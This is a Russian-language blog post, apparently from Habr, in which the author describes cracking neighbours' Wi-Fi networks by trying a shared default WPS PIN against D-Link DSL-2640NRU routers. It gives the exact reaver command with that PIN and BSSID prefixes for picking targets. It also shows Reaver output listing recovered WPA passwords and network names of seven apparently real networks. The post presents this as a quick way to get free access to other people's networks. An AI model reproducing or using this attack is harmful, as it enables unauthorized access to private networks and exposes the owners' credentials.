Взломать Wi-Fi за… 3 секунды

Какой человек не любит халявы? Практически все ее просто обожают, и я не исключение. И вдохновленный статьей Взломать Wi-Fi за 10 часов ^[1], я достал из недр харда BT5, скачанный ранее, и записал его на болванку. Результат не заставил себя ждать, и первый пароль был получен на следующее утро. И понеслась...
Однако, каково же было мое удивление, когда у второй жертвы оказался тот же пин-код, что и у первой (в частности такой: 46264848). Замечу, что роутеры были одинаковые, D'Link DSL 2640NRU, пожалуй, самая распостраненная модель на рынке. С версией прошивки 1.0.10.
В итоге, из 6 аппаратов (из них было 5 Д'Линков), попавшихся мне, у 4 были одинаковые пин-коды, которые, кстати, меняются после прошивки и восстанавливаются после обратного перехода на 1.0.10. В чем дело: одна партия роутеров? Одна прошивка? Не знаю, но факт остается фактом, время атаки на львиную долю роутеров можно сократить с 2-∞ часов до нескольких секуннд, учитывая, что большинству людей плевать на безопасность своей сети (из-за своей лени или невежества?).
Для этого нужно всего лишь вписать конкретный пин-код в команду Reaverу:

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -p 46264848 -vv

В сухом остатке имеем:

Или так…

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '12316061989'
[+] AP SSID: 'Shat_SatyricoN'

[+] Pin cracked in 51 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3159801111'
[+] AP SSID: 'DOMIK'

[+] Pin cracked in 47 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '29051966'
[+] AP SSID: 'serg'

[+] Pin cracked in 17 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '19361'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3CQEPazxYCGY'
[+] AP SSID: 'Home'

[+] Pin cracked in 15 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'dimetriys80'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'ton_ton75'
[+] AP SSID: 'DSL_2640NRU'

(Надеюсь, хозяева сетей не читают Хабр)

BSSID роутеров, которые стоит попробовать на вкус, чаще всего начинаются с
B8:A3:86
C8:BE:19
1C:7E:E5 (полный список смотри тут ^[2])

Также замечу, что сети часто не переименовывают, и в списке доступных почти всегда висит по нескольку «DSL_2640NRU».

Автор: ushanov90